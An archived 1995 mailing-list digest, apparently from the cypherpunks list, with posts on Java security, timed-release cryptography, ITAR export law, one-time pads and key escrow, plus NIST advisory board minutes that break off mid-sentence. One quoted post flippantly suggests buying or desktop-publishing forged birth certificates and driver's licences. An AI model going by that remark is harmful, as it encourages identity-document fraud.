yawn) about scouts and scouting.  Part of the territory, I guess. 

We're Canadian.  We're civilized about these things.

>If you're ever in town, they're just a bit past Carleton U. on Heron. 
>(it doesn't say CSE on the signs, but the guy at the gate will tell you so)

Thanks.

Personally, I'm much more interested in the Museum of Civilization.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From anonymous-remailer at shell.portal.com  Wed Nov  8 01:36:21 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 8 Nov 1995 17:36:21 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05420@jobe.shell.portal.com>


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publically
in Washington, tommorow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, a open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the softwre under its own brand name) 
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From jbell at capecod.net  Wed Nov  8 04:31:36 1995
From: jbell at capecod.net (John Curtis)
Date: Wed, 8 Nov 1995 20:31:36 +0800
Subject: expiration dates on cryptography
Message-ID: <01BAADAA.DFB5F740@hy36.capecod.net>


The discussion between Mr. May and Mr. Shields concerning
time-release cryptograhy raised an interesting question in my 
mind.

Given that trust is often of an ephemeral nature, it would be
quite useful to set time limits on secrets.  Would it be possible
to cryptographically protect a secret such that it could not be
decrypted after a certain time?

I suspect that the laws of thermodynamics might prohibit this
in classical cryptography because as a message expired the 
amount of entropy would decrease.  Quantum cryptography
might work, but that will be science fiction for some time to
come.

Has anyone either shown how to do this or proven it impossible?







From perry at piermont.com  Wed Nov  8 06:17:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 22:17:03 +0800
Subject: expiration dates on cryptography
In-Reply-To: <01BAADAA.DFB5F740@hy36.capecod.net>
Message-ID: <199511081406.JAA00267@jekyll.piermont.com>



John Curtis writes:
> The discussion between Mr. May and Mr. Shields concerning
> time-release cryptograhy raised an interesting question in my 
> mind.
> 
> Given that trust is often of an ephemeral nature, it would be
> quite useful to set time limits on secrets.  Would it be possible
> to cryptographically protect a secret such that it could not be
> decrypted after a certain time?

No.

.pm





From perry at piermont.com  Wed Nov  8 06:19:22 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 22:19:22 +0800
Subject: DejaNews all over again
In-Reply-To: <199511080306.TAA10540@jobe.shell.portal.com>
Message-ID: <199511081408.JAA00279@jekyll.piermont.com>



anonymous-remailer at shell.portal.com writes:
> I wish that Detweiler could (seriously) go back to wherever he came from. 

What a fascinating statement to make, considering that you are
probably Detweiler.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 





From stewarts at ix.netcom.com  Wed Nov  8 07:52:25 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 8 Nov 1995 23:52:25 +0800
Subject: Newt on Crypto
Message-ID: <199511080454.UAA08566@ix.ix.netcom.com>


>From John Young's posting CYB_lip of a column from the Washington Post

>   "At some point in the not-very-distant future," said
>   Speaker Newt Gingrich (R-Ga.) in an August interview in
>   Wired with computer guru Esther Dyson, "somebody is going
>   to have encryption you can't break.... Governments are not
>   going to be able to stop it."

Newt's an optimist (from the government perspective.)
At some point in the not-very-distant future, 
_everybody_ is going to have encryption the government can't break!


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From adam at lighthouse.homeport.org  Wed Nov  8 08:06:45 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 9 Nov 1995 00:06:45 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <199511081517.JAA00972@galil.austnsc.tandem.com.>
Message-ID: <199511081544.KAA06043@homeport.org>


	Since the size of the net is more than doubling each year,
over half the people online at any given time are newbies.*  It is not
reasonable to expect a newbie to understand IP routing.  Neither IP
routing nor the design of the backbone is intuitively obvious.
Therefore, it is not reasonable to assume that a user in Italy or
Germany has any idea that their packets might travel through the
United States.  

	Nor is it reasonable to assume that a user outside the US is
familiar with the ITARs.  They're an obscure set of regulations, on
the surface contrary to the First Amendment, and not even well known
within the United States.

	I find it hard to believe that given the obscurity of IP
routing, the backbone design, and the obscurity of the ITAR that a
jury would find a foreign person guilty of unknowingly violations of
the ITAR.  Any comment on this line of reasoning from our lawyer
friends?

Adam


Sten Drescher wrote:
| Adam Shostack <adam at lighthouse.homeport.org> said:
| 
| AS> 	Thus, if the user in Italy has no reason to expect that their
| AS> mail to Germany will traverse the US, then I suspect that the US
| AS> would have a hard time proving any criminal act.  Doesn't a criminal
| AS> act require intent of some type?  If IP routing, in conjunction with
| AS> SMTP, beyond the control of the users, ships packets through the US,
| AS> I have a hard time believing that that makes those users criminals.
| 
| 	IANAL, but if they have the intent to transfer cryptographic
| software, and can 'reasonably' (wonderful precision there) be expected
| to know that there is the potential for portions of the transfer to be
| routed through US systems, then I'm guessing that it could be construed
| that they had the intent to commit a crime.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From tcmay at got.net  Wed Nov  8 12:09:37 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 04:09:37 +0800
Subject: nym-compoop
Message-ID: <acc2c76d080210041e54@[205.199.118.202]>


[I have taken the liberty of deleting "speaker at leg.state.vt.us"  and
"villuzzi at leg.state.vt.us" from the cc: list, as I think cross-pollinating
our list with state asssembly houses is even worse than being "assimilated"
by wwwbuyinfo and e$-list.]


At 2:35 AM GMT 11/6/95, Stephen Whitaker wrote:

>Eating my tasty crow gives rise to another question relating to the timing
>and continuity of these threads: How did the first responder on the RE:
>134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
>of 7:19AM on Nov 5? Which way is this thing spinnin?

Have you heard of time zones?

The first message, from Anonymous, was sent from the Replay remailer (in
Amsterdam, I recall).

Date: Sun, 5 Nov 1995 07:20:12 +0100
Subject: lp (134.222.35.2)?
To: cypherpunks at toad.com
From: nobody at REPLAY.COM (Anonymous)

07:20 in the +0100 timezone is of course 22:20 of the previous day
(Saturday) in the -0800 time zone.

The reply by Spero was sent

Date: Sat, 4 Nov 1995 22:48:39 -0800 (PST)
From: Simon Spero <ses at tipper.oit.unc.edu>
X-Sender: ses at chivalry
To: Anonymous <nobody at REPLAY.COM>

Looks harmless to me.

However, there is increasing evidence the intelligence agencies have
managed to open up a portal in time, using the tachyonic devices being
manufactured by Tachytronx, of Woodland Hills.

These time portals are used by Science Applications to launder money back
to eras in which it was needed.

One of the major remailers is located on a system called "Portal," which
ought to be enough to convince anyone in these paranoic times.

--Klaus! von Future Prime, whose chronotransport secrets now stand revealed







From dlv at bwalk.dm.com  Wed Nov  8 12:12:03 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 9 Nov 1995 04:12:03 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <yDL5DD3w165w@bwalk.dm.com>


Duncan Frissell <frissell at panix.com> writes:
> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
>
> You need proof of citizenship or residency and proof of identity.  Passport
> and naturalization papers work for both.  Otherwise you have to pay the $25
> to the guy on the corner for a birth certificate and drivers license.  Or
> DTP it yourself since employers aren't very good at checking papers.  Or
> dodge the whole thing and work for yourself.

I've had to deal with I-9 twice in the last 6 months; both times they happily
accepted my U.S.Passport as both the proof of identity and the proof of work
authorization. The naturalization certificate is a little tricky because it's
not supposed to be photocopied. I suppose the h.r. would take it (because it's
listed on the I-9) and photocopy it despite the warning on it. :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From whitaker at sover.net  Wed Nov  8 12:15:04 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Thu, 9 Nov 1995 04:15:04 +0800
Subject: nym-compoop
Message-ID: <199511060335.WAA04917@maple.sover.net>


I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
minutes out of step and having lowered my reputation in his/her eyes. Now
I'll ask my question again, which apparantly got lost in the collective
groan of my stale post:

        Are there ways for someone with access to modify router tables 
        to constantly create alternate paths at other routers 
        which would serve to end-around any such snoops?

This question is now offered in the context of the _hypothetical_situation_
of there being snoops out here in the first place. Later I'll ask about
sniffing for sniffers.

One reason for this post is the fact that certain ambitious bureaucrats here
in Vermont have decided to build, own and control the internet, connecting
governments, schools and a few businesses. There is no encryption in use by
the government agencies and they have let the school hackers and teachers on
now to share the T-1 backbone with the state agencies and contractors
(medicaid/EDS) carrying personal information collected and managed by state
government. 

These [ir]responsible parties refuse to provide any documentation requested
under public records law demonstrating that a security plan or practice is
in place. The high schools are offered 56K circuits for $5K/annual and a
share of a gov'ment network manager who wont answer his e-mail and doesn't
know where to begin looking for copies of it, when it too is requested under
our public records laws. 

Our governor stated in his address to the legislature that these 56K lines
will let an "unlimited number of students access the internet
simultaneously". Anybody got a bridge?

I sure would like to hear from some folks who would be willing to aid in
paying close attention, discussing the implications and appropriateness of
encryption technologies for this situation, aiding in testing for sniffers,
etc. This request is offered as an attempt to keep a step ahead of the
public/private competition, privacy accident-waiting-to-happen and the
surveillance potential/practice of such a beast.

If someone who feels strongly that this is off-topic for this list makes
that case I'll carry my inquiry elsewhere, after a little cross-fire, of
course. I even went back and just now read the "Welcome to" message to see
whether these issues fall withih the scope.

I can hardly find anyone who even cares about the fact that our legislature
relies on the executive branch gov-net managers for their port/connection on
the internet router. They also rely on the executive branch for
troubleshooting their novell LAN. Does anyone else see a separation of
powers issue or privacy issue here? Note that I cc: the speaker, who cares
but doesn't yet grasp the implications. Feel free to write him directly. His
name is Michael Obuchowski, Obe for short, <speaker at leg.state.vt.us>, tell
him I sent you.

At this point offering encryption software to school age kids is a whole lot
easier than convincing bureaucrats that it's a good practice. This wont
solve the problem of poor practice by government though. Unfortunately this
will also likely frighten the school network techies, administrators and
school board members.

Anybody have a copy of any good, tight, discovery orders which can be useful
in gaining court ordered access to prevent destruction of evidence and for
combing the electronic files and e-mail of these accountable public servants
to demonstrate that they don't know what there doing? (responses to the
legal points by private e-mail please. Do I come across as litigious?)

The Boston Globe did a good front page story a week or ten days ago entitled
"e-mail as evidence". Mostly the story was relating to lawyers and
consultants making big money aiding corporations to assure that the really
damaging, unencrypted e-mail is thoroughly scrubbed from all systems.

Back to where this started:
Eating my tasty crow gives rise to another question relating to the timing
and continuity of these threads: How did the first responder on the RE:
134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
of 7:19AM on Nov 5? Which way is this thing spinnin?

Stephen Whitaker
P. O. Box 1331
Montpelier, Vermont
05601-1331
802.479.6118






From warlord at MIT.EDU  Wed Nov  8 13:33:52 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 9 Nov 1995 05:33:52 +0800
Subject: using pgp to make an otp
In-Reply-To: <199511070407.XAA04557@homeport.org>
Message-ID: <199511070431.XAA17598@toxicwaste.media.mit.edu>


> 	PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

-derek





From hallam at w3.org  Wed Nov  8 13:37:26 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 9 Nov 1995 05:37:26 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070400.XAA14905@jekyll.piermont.com>
Message-ID: <9511070433.AA11349@zorch.w3.org>



>Were that the case, citizens couldn't sue to have provisions impacting
>them enforced, but the fact of the matter is that they can.

Various treaties provide that various privilleges will be granted to various 
citizens of the countries concerned. Do the treaties grant such privilleges in 
this case? Just because there is a treaty on nuclear disarmament between the US 
and the USSR does not mean that you as a private citizen can press for 
enforcement through the courts if you think that the USSR is not performing.


>> Perry's somewhat offensive language is not a substitute for an argument.

>Thank you for the ad hominem.

Perry used the phrase "lobotomized mongoloid judge" I think that this
type of language is offensive and unnecessary.

Ad hominem is a perfectly valid form of argument where one is considering
the reputation of the person making the statement. I don't think that 
the type of language and tactics Perry uses reflect well upon him. What is
"I am starting to have trouble believing you are a lawyer." if not ad 
hominem in any case?






From herbs at interlog.com  Wed Nov  8 13:37:30 1995
From: herbs at interlog.com (Herb Sutter)
Date: Thu, 9 Nov 1995 05:37:30 +0800
Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511070413.XAA07602@gold.interlog.com>


I've always read with interest Sameer's notes, and I also enjoyed this one.
I just can't figure out why he's writing it (spelling and grammar errors aside):

At 07:52 11.06.1995 -0800, sameer wrote:
>For Immediate Release
>Date: Nov 6th, 1995
>Contact: Sameer Parekh 510-601-9777 sameer at c2.org
>
>PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

This title and the opening paragraphs seem unnecessarily (and
misleadingly[*]) alarmist, given the recent spate of similar mass-media
articles.  After the lead and second paragraphs repeatedly talk about
"holes", "make viruses and other malicious programs possible", etc., it
isn't until the third paragraph that we read a calmer quote:

[*] Java isn't really 'Internet security software', and the students didn't
find a hole in any current version according to the rest of the text.

>"While we did find some interesting holes, we believe these can be
>addressed and Java could make a good standard for remote code on the
>Web, if an effective security policy is defined."

The opening paragraphs sure didn't reflect this.  Then:

>The holes they found exist only in the alpha release of HotJava. The
>beta release, which is the version found in the widely-used Netscape
>Navigator 2.0b1J is not vulnerable to these attacks.

They do?  It's not?  Then... why mention it at all?!

If this is so, it's a dead issue, old news, passe'.  Why another alarmist
press release (other than to promote Community ConneXion's decision to add
Java to its hit list <grin duck & run>)?  The public's paranoid enough about
net commerce; why should we, of all people, fan the flames?

This isn't to bash Sameer, whose posts I always enjoy reading.  I'm just a
bit puzzled by this one...

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019






From tcmay at got.net  Wed Nov  8 13:37:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:37:51 +0800
Subject: Paranoia Has Its Uses
Message-ID: <acc432a115021004a17f@[205.199.118.202]>


At 4:10 AM 11/7/95, Carl Ellison wrote:
> ``According to the former head of Romania's secret police, Ion Mihai
>Pacepa, there had been ten million microphones in a country of twenty-three
>million people.  That would mean that nearly everyone had been listened to
>and then blackmailed into listening and reporting on others.  A maze of
>psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
>Hole In The Flag", pp. 21-22]

This was the Romanian version of key escrow, don't you know?

"Conversation Escrow" was scrupulously safeguarded in Ceausescu's Romania,
with conversations only unlocked if a "court order" was obtained lawfully.

(Of course, governments get to make the laws, get to enforce them, and so
it goes.)

Theodore Roszak, influential author of "The Making of the Counterculture"
(1969), was bemoaning the apparent distrust people now have in governments,
and thinking he and his generation are partly to blame for the current
paranoia and mistrust. He was bemoaning the fact that nobody trusts that
government can fix society's problems, that everyone from leftists to
rightists apparently hates the way government works.

Relevance? Next time someone mentions "safeguards" in connection with GAK,
remind them about Tricky Dick and his "Enemies List." Or about possibly
greater abuses by other presidents. Remind them of what might happen if a
Religious Right president is trying to crack down on abortions,
pornography, and drugs.

This may make a doubter out of someone. It may be paranoia, but paranoia
has its uses.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Wed Nov  8 13:39:26 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:39:26 +0800
Subject: Timed-release crypto and information economics
Message-ID: <acc4182012021004674b@[205.199.118.202]>



First, let me congratulate Michael Shields for working on this problem, and
for (possibly?) coming up with a cleaner scheme.

I confess that I'm not clear on how his scheme differs from mine. Let me
hasten to add that my 1993 proposal was intended to be more conceptual than
practical, to illustrate how distibuted escrow agents (escrow in the real
sense, not in the GAK sense) could be used to "send messages into the
future," a tool that has several intriguing applications, some of which
Michael explores in the second part of his post.

At 12:09 AM 11/7/95, Michael Shields wrote:

>In the May proposal, when you have a message to be encrypted, you
>encrypt it with a session key, optionally split that key with an n-of-m
>scheme, and then send the key into a network of escrow agents, which are
>instructed to hold the message for a given period of time.  You then
>hold onto the encrypted message, though you need not keep it secret.
>Conceptually, you have encrypted a message and then remailed the key to
>yourself in such a way that it will take X length of time to arrive.

Sending either the pieces of the message or the pieces of the key seem
closely related to me (they go together). In principle, it is only the key
that counts, so that is what I would focus upon.

>I have a simpler, public-key plan.  When you want to keep a message
>secret until date X, you ask your favorite crypto house to generate a
>key pair and hold the secret key until date X.  You then encrypt your
>message with the public key, and again hold onto the encrypted message.
>N-of-m trust management can be implemented by secret-sharing your message
>and encrypting each with a key generated by a different crypto house.

This seems to be saying the same thing. In both cases, "Alice" is either
distributing a message to"Bob," "Charles," "Donna," etc., with instructions
not to return the pieces until Date X, or is holding onto a sealed message
but asking that the decryption keys not be returned until Date X. I don't
see the real difference, modulo some minor factors. In neither case can the
original message be reconstructed unless n out of m of the escrow agents
provide the pieces.

I hope we are not miscommunicating because of terminology or because of the
continuing Net problem of not being able to draw pictures showing what is
going on.


>I'll let everyone tear into this for a few days, and then I'll put up a
>server for timed-release key generation, charging maybe c$1.  I'd like
>to then enhance it to be capable of issuing bonds and loans denominated
>in c$.  (I like the cyberbucks trial because it's officially play money,
>so there aren't any regulatory burdens.)  This should be interesting.

In any case, I look forward to seeing reaction to this. This could be an
important service. (In many ways much more interesting than fairly mundane
"Internet commerce" applications.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From nobody at REPLAY.COM  Wed Nov  8 13:42:30 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 05:42:30 +0800
Subject: CSSPAB June 1995
Message-ID: <199511070540.GAA27604@utopia.hacktic.nl>




URL: http://csrc.ncsl.nist.gov/csspab/minutes.695


[Reformatted for easier reading]


                       MINUTES OF THE
                JUNE 7-8, 1995 MEETING OF THE
     COMPUTER SYSTEM SECURITY AND PRIVACY ADVISORY BOARD

Wednesday, June 7, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware, called
the meeting to order at 9:00 a.m. at the National Institute of
Standards and Technology (NIST), Gaithersburg, Maryland.
Besides Dr. Ware, the following Board members were present: 
Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don
Gangemi, Sandra Lambert, Joseph Leo, Henry Philcox, Randy
Sanovic, Linda Vetter, Steve Walker, and Bill Whitehurst.

Mr. Ed Roback, Board Executive Secretary and newly appointed
Designated Federal Official, discussed some of the handouts
provided to the Board.  Most important, was a copy of a draft
House bill referred to as the "Department of Commerce
Dismantling Act."  If enacted, part of NIST would be
transferred to the National Science Foundation.  The Commerce
Program Resolution Agency (CPRA) would be established and
attempt to sell NIST laboratories (and other specified
elements of the Department of Commerce) to the private sector. 
If not sold within 18 months of enactment, CPRA would submit
their recommendations to Congress on the appropriate
disposition of the property and functions of the laboratories.


OMB Circular A-130, Appendix III Update and Review of Comments
and "NII Security: The Federal Role" 

Mr. Ed Springer of the Office of Information and Regulatory
Affairs, Office of Management and Budget (OMB), updated the
Board on the recently signed Paperwork Reduction Act of 1995.
(Copies are available for distribution to the Board.)  (ACTION
- SECRETARY).  Mr. Springer said that security remains a
concern and is supported by strong language in the law
requiring agencies to secure their systems. Mr. Springer
updated the Board on Appendix III to OMB Circular A-130. 
Since his briefing to the Board in March, the comment period
for the proposed changes to Appendix III has closed.  OMB
received twenty-nine written comments to date. He solicited
Board members for their reactions to the draft proposal.  Mr.
Springer was asked how OMB will enforce the requirements of
Appendix III.  He said enforcement comes through oversight and
the budget process. There is a sharper focus on where agencies
can go for help. One Board member asked if OMB plans to
develop a standard set of behaviors.  Mr. Springer replied
that OMB will not go that far; however, Appendix III addresses
the risks for agencies to use as a guideline for security
considerations.  Board members noted that agency visits to
senior management regarding security plans, as was conducted
in the 1989-1990 timeframe, seemed successful.  Mr. Springer
said that the Federal Managers Financial Integrity Act
provides oversight of the requirement for agencies to prepare
new plans.  Mr. Springer agreed to brief the Board at its
September meeting to further discuss the comments received and
current status.  He mentioned that the final document "NII
Security: The Role of Federal Government," would be out soon
and Board members would receive copies.  (ACTION - SECRETARY).


Defensive Information Warfare & Unclassified Government and
Private Sector

Mr. Martin Hill, Deputy Director for Information Warfare
Programs, Office of the Assistant Secretary of Defense,
briefed the Board on Information Warfare (IW) from a DoD
perspective. He said that commanders should not depend on
information and information systems that they cannot rely on. 
He used the example of Desert Storm, which was a won through
the use of intelligence; Iraq, in effect, lost the war before
it even began.  Mr. Hill said that IW is driven by daily
attacks on U.S. computer networks.  The national security
construct is changing because DoD utilizes commercial sector
security and shares their vulnerabilities.  The DoD
unclassified definition of IW is "Actions taken to achieve
information superiority in support of national military
strategy by affecting adversary information and information
systems while leveraging and protecting our information and
information systems."  Some of the areas that need defending
are: leadership; command facilities; integrated air defense
and controls; computers, software, data bases, and displays;
power production sources; and links to media. The U.S. IW
strategy is to:

-  Use U.S. technological superiority to provide the right
   information to the right place at the right time,

-  Aggressively defend against attacks on our information, and

-  Use offensive techniques to attain and maintain information
   superiority.

Mr. Hill also emphasized the need for and importance of
training.  He said they have assembled "Red Teams" made up of
DoD personnel that converge on other DoD systems to determine
their vulnerabilities.  When asked how DoD could best
communicate their requirements to the commercial sector, Mr.
Hill said that they conduct seminars and "war games" which are
both attended by industry.  (See Reference #1.)


X/Open Security Branding Proposal

Mr. Peter Callaway, Senior Security Technologist for IBM,
provided the Board with an update on the X/Open security
branding proposal.  Mr. Callaway was speaking from three
perspectives: IBM (a member of X/Open), X/Open, and as a user. 
He said that X/Open feels they have the appropriate and proven
experience by setting industry standards and performing
conformance branding.  X/Open has the commitment of vendors to
build products to their specifications with regard to
technical plans established with vendor cooperation and
commitment to product follow-through.  X/Open Branding is a
certification scheme for conformance verification, not
evaluation. Currently, X/Open branding requires evidence of
successful execution of a test suite where appropriate test
suites are available.  It requires a conformance statement
questionnaire and a trademark license agreement to be
completed by the applicant.  (See Reference # 2.)


Security Policy Board (SPB) Update

Ms. Vicki LaBarre, Security Policy Board (SPB) Staff, briefed
the Board on the progress of the SPB.  Ms. LaBarre reminded
the Board of the role of the SPB as chartered by Presidential
Decision Directive (PDD)-29.  The SPB and Security Policy
Forum are jointly chaired by DoD and intelligence community
members, but their members include non-DoD and
non-intelligence community representatives. Ms. LaBarre
relayed that the SPB considers itself an "honest broker" to
identify issues and positions from all parties on key
questions.  She said that the fundamental question is whether
the executive branch needs a single, consolidated INFOSEC
policy making mechanism.

If a consolidated INFOSEC policy making mechanism is needed: 
Can the existing SPB structure created by PDD-29 meet that
need?

-  If yes: how should an information systems security
   committee be chartered and constituted?

-  If not: how could/should the SPB/SPF be modified to become
   an effective INFOSEC policy mechanism?  What other existing
   entity in the executive branch could act, or be modified to
   act as the executive branch's INFOSEC policy making
   apparatus?  What kind of new entity could be created to
   meet this policy making need?

If a consolidated INFOSEC policy making mechanism is not
needed:

-  How can the existing INFOSEC policy and advisory boards,
   committees, forums, etc., be made to more effectively
   identify, prioritize, resource and act on major INFOSEC
   issues and vulnerabilities affecting the national interest?

-  Are executive branch INFOSEC resources adequate to provide
   for acceptable security for government information systems?

-  Are existing INFOSEC resources appropriately located and
   distributed within the executive branch?

Recently the SPB staff convened a special working group to
draft a resolution to call for compiling a list of major
INFOSEC issues.  The matter will be discussed at the Security
Policy Board Forum meeting on June 23.  In summary, Ms.
LaBarre emphasized that we must to do a better job of INFOSEC
governmentwide which is doable if everyone works together for
the common good.

Throughout Ms. LaBarre's presentation, some Board members
expressed serious concerns about many aspects of the SPB's
charter, the first SPB staff report and their present stance
on the effort of a single policy making mechanism.  Some Board
members expressed the view that the initial report was not
clear with regard to what kind of information would encompass
"national interest." She said that the first report was purely
a "think piece" to stimulate discussion, which it has done.
(See Reference #3.)


Commercial Key Escrow Update

Mr. Steve Walker, President, Trusted Information Systems
(TIS), presented the Board with an update of TIS' Commercial
Key Escrow (CKE) activities.  Mr. Walker recently met with
senior management of National Semiconductor Corporation.  They
discussed a proposal to use CKE in an escrowing approach
called Commercial Automated Key Escrow (CAKE) in which the CKE
system has been modified to work with National's PersonaCard
cryptographic hardware tokens. Mr. Walker believes that this
approach meets the needs expressed by the Vice President. 
CAKE does the following:

1. It removes all very strong cryptography from software.

2. It uses these special CAKE tokens to automatically escrow
   an encrypted copy of every message key within the message
   envelope itself, in a special Data Recovery Field (DRF)
   consisting of the message key and Data Recovery Center
   (DRC) and token identifiers, encrypted with the public key
   of a Designated DRC.

3. It provides access to DRFs via the private key of the DRCs,
   and allow any user to establish their own DRC to safeguard
   corporate information.

4. It uses well known cryptographic algorithms such as DES,
   triple DES and RSA, instead of algorithms such as Skipjack.

5. Finally, it gives American computer and communications
   industries the ability to easily export strong and very
   strong encryption as part of their information highway
   products.

Mr. Walker briefly discussed the software binding issue which
have been put off by implementation into the PCMCIA card but,
it still needs to be tried and a software vendor is being
